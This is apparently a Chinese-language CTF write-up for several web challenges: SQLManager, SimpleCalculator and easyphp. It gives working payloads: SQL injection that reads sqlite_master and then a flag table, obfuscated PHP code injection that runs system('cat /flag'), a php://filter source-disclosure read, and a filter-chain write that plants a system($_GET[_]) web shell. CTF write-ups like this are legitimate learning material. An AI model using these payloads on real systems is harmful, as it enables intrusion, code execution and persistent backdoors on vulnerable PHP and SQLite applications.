WEB
SQLManager
table_name=[aaa]as select [sql][&columns[0][name]=]from sqlite_master;&columns[0][type]=2
得到数据库名和字段名
CREATE TABLE flag_Y0U_c4nt_GUESS
(flag_ThE_C0lumn
TEXT)
table_name=[aaa]as select [flag_ThE_C0lumn][&columns[0][name]=]from flag_Y0U_c4nt_GUESS;&columns[0][type]=TEXT
读取就完事了
SimpleCalculator
search=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat /flag
签到
拼图
easyphp
文件包含可以发现
index.php?page=php://filter/read=convert.base64-encode/resource=index.php
<?php
error_reporting(0);
$page = isset($_GET['page']) ? $_GET['page'] : 'main.html';
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
header('location:index.php?page=main.html');
}
// You may want to see 7fa3b767c460b54a2be4d49030b349c7.php
?>
7fa3b767c460b54a2be4d49030b349c7.php
wmctf2020原题。
7fa3b767c460b54a2be4d49030b349c7.php?content=php://filter/write=string.strip_tags|zlib.inflate|%3F%3E%b3%b1%2f%c8%2
8%50%28%ae%2c%2e%49%cd%d5%50%89%77%77%0d%89%8e%8f%d5%b4%b6%b7%03%3C%3F/resourc
e=ha1c9on.php
//?><? system($_GET[_]);
然后访问